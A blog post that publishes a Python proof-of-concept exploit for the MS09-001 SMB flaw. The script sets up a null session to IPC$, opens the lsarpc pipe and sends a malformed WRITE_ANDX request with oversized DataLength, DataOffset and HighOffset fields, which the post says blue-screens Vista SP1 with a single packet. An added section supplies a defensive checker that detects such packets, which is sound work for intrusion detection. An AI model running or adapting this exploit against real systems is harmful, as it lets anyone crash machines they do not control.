MS09-001 SMB DoS PoC Exploit Vulnerability Alert - Computer Materials

Computer Materials   Posted: 2019-01-01

    Today I wrote an SMB DoS PoC in Python and tested it against Vista SP1:

    a single packet causes an immediate blue screen. It does not work on XP SP2, though, because XP SP2 by default does not allow null-session access to the lsarpc, samr and other named pipes.


    # MS09-001 SMB Dos Vulnerabilities Poc Exploit
    # Author : vessial
    # http://hi.baidu.com/vessial
    # Tod
    # [+] test vista sp1, system BSOD
    # Reference : http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx
    #             http://www.milw0rm.com/exploits/6463
    #
    # Python 2 script written against the impacket SMB API of that time
    # (str is used for raw bytes, SMB1 packet classes from impacket.smb).
    import impacket
    from impacket import smb
    from impacket import nmb

    remote = smb.SMBPacket('')    # unused by the PoC, kept as in the original

    # Connect to the target on port 445 and set up a null session
    r = smb.SMB('*SMBSERVER', '192.168.40.129', None, nmb.TYPE_SERVER, 445)
    r._login('', '', '', 'WORKGROUP')
    tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$')

    # NT_CREATE_ANDX: open the \lsarpc named pipe over IPC$
    smb1 = smb.NewSMBPacket()
    smb1['Flags1'] = 0x18
    smb1['Flags2'] = 0xc807
    smb1['Tid']    = tid

    ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
    ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
    ntCreate['Data']       = smb.SMBNtCreateAndX_Data()
    ntCreate['Parameters']['FileNameLength'] = 14      # 7 UTF-16LE characters
    ntCreate['Parameters']['AndXOffset']     = 0xdede
    ntCreate['Parameters']['CreateFlags']    = 0x16
    ntCreate['Parameters']['AccessMask']     = 0x2019f
    ntCreate['Parameters']['CreateOptions']  = 0x400040
    ntCreate['Parameters']['ShareAccess']    = 7
    ntCreate['Parameters']['Impersonation']  = 2
    ntCreate['Parameters']['Disposition']    = 1
    # pad byte, then "\LSARPC" as UTF-16LE, then the null terminator
    ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"

    smb1.addCommand(ntCreate)
    r.sendSMB(smb1)
    recv = r.recvSMB()

    if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):
        ntCreateResponse   = smb.SMBCommand(recv['Data'][0])
        ntCreateParameters = smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
        fid = ntCreateParameters['Fid']

        # WRITE_ANDX to the pipe handle with DataLength, DataOffset and
        # HighOffset set to values that do not match the 72-byte payload
        smb1 = smb.NewSMBPacket()
        smb1['Flags1'] = 0x18
        smb1['Flags2'] = 0
        smb1['Tid']    = tid

        data = "A" * 72
        writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
        smb1.addCommand(writeAndX)
        writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
        writeAndX['Parameters']['Fid']        = fid
        writeAndX['Parameters']['AndXOffset'] = 0xdede
        writeAndX['Parameters']['Offset']     = 0
        writeAndX['Parameters']['WriteMode']  = 8
        writeAndX['Parameters']['Remaining']  = len(data)
        writeAndX['Parameters']['_reserved']  = -1
        writeAndX['Parameters']['DataLength'] = 0xffff
        writeAndX['Parameters']['DataOffset'] = 0xffff
        writeAndX['Parameters']['HighOffset'] = 0xcccccccc
        writeAndX['Data'] = data

        r.sendSMB(smb1)
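The WRITE_ANDX request above is malformed in a way that is visible on the wire: its DataLength and DataOffset fields point far past the end of the message. The following is an added example (my own code, not the PoC author's and not part of the original post) of a defender-side sanity check that parses an SMB1 WRITE_ANDX request and reports header/parameter inconsistencies of exactly that kind. It assumes the message starts at the SMB header (0xFF 'SMB'), i.e. the 4-byte NetBIOS session header has already been stripped, and that DataOffset is measured from the start of that header as the SMB1 protocol specifies. The function names, the `build_write_andx` helper and the sample packets are constructed here for the example and are never sent anywhere.

```python
import struct

# SMB1 constants (protocol-defined, not taken from the PoC)
SMB_COM_WRITE_ANDX = 0x2F
SMB_HEADER_LEN = 32          # 0xFF 'SMB' + command + status + flags ... + MID
WRITE_ANDX_PARAM_FMT = "<BBHHIIHHHHH"   # 12 words: AndXCommand .. DataOffset


def parse_smb_header(msg):
    """Return (command, flags2) from a raw SMB1 message without NetBIOS prefix."""
    if len(msg) < SMB_HEADER_LEN or msg[:4] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    command = msg[4]
    flags2 = struct.unpack_from("<H", msg, 10)[0]
    return command, flags2


def check_write_andx(msg):
    """Return a list of findings for a WRITE_ANDX request (empty = looks sane).

    Only WRITE_ANDX is inspected; any other command yields no findings.
    """
    findings = []
    command, _ = parse_smb_header(msg)
    if command != SMB_COM_WRITE_ANDX:
        return findings
    word_count = msg[SMB_HEADER_LEN]
    # WRITE_ANDX carries 12 parameter words, or 14 when HighOffset is present
    if word_count not in (12, 14):
        findings.append("unexpected WordCount %d" % word_count)
        return findings
    params = msg[SMB_HEADER_LEN + 1:SMB_HEADER_LEN + 1 + 2 * word_count]
    if len(params) < 2 * word_count:
        findings.append("truncated parameter block")
        return findings
    fields = struct.unpack_from(WRITE_ANDX_PARAM_FMT, params, 0)
    andx_cmd, andx_off = fields[0], fields[2]
    data_len, data_off = fields[9], fields[10]
    # The data block can start no earlier than right after the ByteCount field
    min_data_off = SMB_HEADER_LEN + 1 + 2 * word_count + 2
    if data_off < min_data_off:
        findings.append("DataOffset 0x%04x points inside the header/parameters" % data_off)
    if data_off + data_len > len(msg):
        findings.append("DataOffset/DataLength 0x%04x/0x%04x point past the %d-byte message"
                        % (data_off, data_len, len(msg)))
    # AndXOffset only matters when a command is actually chained (AndXCommand != 0xFF)
    if andx_cmd != 0xFF and andx_off >= len(msg):
        findings.append("AndXOffset 0x%04x past end of message" % andx_off)
    return findings


def build_write_andx(data, data_len=None, data_off=None, high_offset=None):
    """Construct a WRITE_ANDX request in memory (constructed sample for the checks).

    Defaults produce a consistent request; overriding data_len/data_off/high_offset
    reproduces inconsistent header fields for testing the detector.
    """
    header = b"\xffSMB" + bytes([SMB_COM_WRITE_ANDX]) + b"\x00" * 27
    word_count = 14 if high_offset is not None else 12
    real_data_off = SMB_HEADER_LEN + 1 + 2 * word_count + 2
    params = struct.pack(WRITE_ANDX_PARAM_FMT,
                         0xFF, 0, 0,          # AndXCommand (none), AndXReserved, AndXOffset
                         0x4000,              # Fid (constructed value)
                         0, 0,                # Offset, Timeout
                         0, len(data), 0,     # WriteMode, Remaining, Reserved
                         len(data) if data_len is None else data_len,
                         real_data_off if data_off is None else data_off)
    if high_offset is not None:
        params += struct.pack("<I", high_offset)
    return header + bytes([word_count]) + params + struct.pack("<H", len(data)) + data


if __name__ == "__main__":
    sane = build_write_andx(b"A" * 72)
    bad = build_write_andx(b"A" * 72, data_len=0xffff, data_off=0xffff,
                           high_offset=0xcccccccc)
    print("sane request:", check_write_andx(sane) or "no findings")
    print("bad request: ", check_write_andx(bad))
```

Run as a script it prints no findings for the consistent request and one finding for the request whose DataOffset/DataLength exceed the message length. The same check fits naturally in a packet-capture filter or an IDS preprocessor, since it needs only the SMB header and the parameter block, not the session state.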
